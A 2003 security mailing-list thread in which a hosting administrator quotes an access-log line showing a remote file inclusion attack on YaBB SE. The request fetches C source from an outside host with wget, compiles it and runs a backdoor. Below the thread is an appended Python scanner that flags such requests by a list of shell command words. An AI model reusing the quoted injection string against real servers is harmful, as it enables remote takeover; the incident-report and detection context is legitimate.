I've had one this weekend too; a hacker used an exploit in yabbse in this way:
<hidden> - - [22/Mar/2003:15:46:15 +0100] "GET /yabbse/Sources/Packages.php?sourcedir=http://lesl13.hpg.com.br/cmd.txt?&cmd=md=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;%20wget%20www.lesl13.hpg.com.br/dsl.c;%20gcc%20-o%20dsl%20dsl.c;%20./dsl HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Thus I had a ./dsl script running as user httpd, which actually opened up a terminal for hackers.
At 01:28 PM 3/20/2003 -0800, Nathan Kondra wrote:
I have found a weird file on my box.
It is a RAQ 4i; the file was ./sushi.
It is attached. I believe that I have been rooted somehow and this file is
the key. Can anyone help me figure out what the hell this thing is and what
it has been doing to my system?
Nathan Kondra
PS If needed I can attach the file
_______________________________________________
cobalt-security mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-security
Kind regards,
Jeroen Wunnink,
[EMAIL PROTECTED]
phone: +31 (035) 6285455
fax: +31 (035) 6838242
http://www.easyhosting.nl
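
A defender-side check for the request pattern in the log line above, added here as an example and not part of the original thread: it scans Apache combined-format access-log lines for query parameters whose value is a remote URL or contains a shell command. The names `inspect` and `scan`, the command word list and the sample lines (documentation addresses, `.invalid` hosts) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format prefix: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
# A parameter value that is itself a URL is what lets an include fetch remote code.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Heuristic, hypothetical word list: a command name followed by an argument.
SHELL_RE = re.compile(r'\b(?:wget|curl|gcc|cc|chmod|mkdir|perl|sh)\s+\S', re.I)

def inspect(line):
    """Return a finding for one access-log line, or None if nothing stands out."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, target, status = m.groups()
    path, _, query = target.partition('?')
    reasons = []
    # Split on '&' only: some forum software uses ';' as a separator in normal
    # URLs (index.php?board=1;action=display), so ';' alone is not a finding.
    for pair in query.split('&'):
        name, _, raw = pair.partition('=')
        value = unquote_plus(raw)
        if REMOTE_RE.match(value):
            reasons.append((name, 'remote-url'))
        if SHELL_RE.search(value):
            reasons.append((name, 'shell-command'))
    if not reasons:
        return None
    return {'client': client, 'time': when, 'path': path,
            'status': int(status), 'reasons': reasons}

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines, shaped like the request quoted in this thread.
SAMPLE = [
    '192.0.2.10 - - [22/Mar/2003:15:46:15 +0100] "GET /forum/Sources/Packages.php'
    '?sourcedir=http://files.example.invalid/cmd.txt?&cmd=mkdir%20/var/tmp/x;'
    '%20wget%20files.example.invalid/a.c HTTP/1.1" 200 318 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [22/Mar/2003:15:47:02 +0100] "GET /forum/index.php'
    '?board=1;action=display HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with status 200, as in the log line above, means the request was served rather than rejected, so the host should be checked for files and processes owned by the web server user.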
